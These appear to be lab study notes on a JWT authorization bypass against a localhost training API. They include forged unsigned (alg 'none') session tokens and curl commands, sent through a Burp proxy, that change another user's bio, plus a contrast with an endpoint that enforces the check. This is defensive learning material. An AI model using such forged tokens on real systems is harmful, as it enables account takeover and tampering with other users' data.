Auth 0x06

PUT JESSAMY JWT AS SESSION/COOKIE

Cookie: session=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVzc2FteSIsInJvbGUiOiJhZG1pbiJ9.

IT WILL SEND TWO REQUEST AT THE SAME TIME

First it will send the PUT request to jeremy account using his JWT

(jeremy JWT --> jeremy bio change)

Then in the burpsuite it will pass the Jessamy JWT then it will bypass the jeremy account and change his bio

( jessamy JWT --> jeremy bio change)

curl -X PUT --proxy localhost:8080 -H "Content-Type: application/json" -b 'session=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0=.' -d '{"username":"jeremy", "bio": "BIO TRYING"}' http://localhost/labs/api/v2/account.php

BUT in the account2.php it will not work

Since the system will check for the JWT and username

(jeremy JWT === jeremy username)

Authorize

(jessamy JWT === jeremy username) -------WRONG

Thats why it says enforced

curl -X PUT --proxy localhost:8080 -H "Content-Type: application/json" -b 'session=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJ1c2VyIjoiamVyZW15Iiwicm9sZSI6InN0YWZmIn0=.' -d '{"username":"jeremy", "bio": "BIO TRYING"}' http://localhost/labs/api/v2/account2.php

PreviousAuth 0x05 APIs 0x01 NextFile Inclusion 0x01

Last updated 11 months ago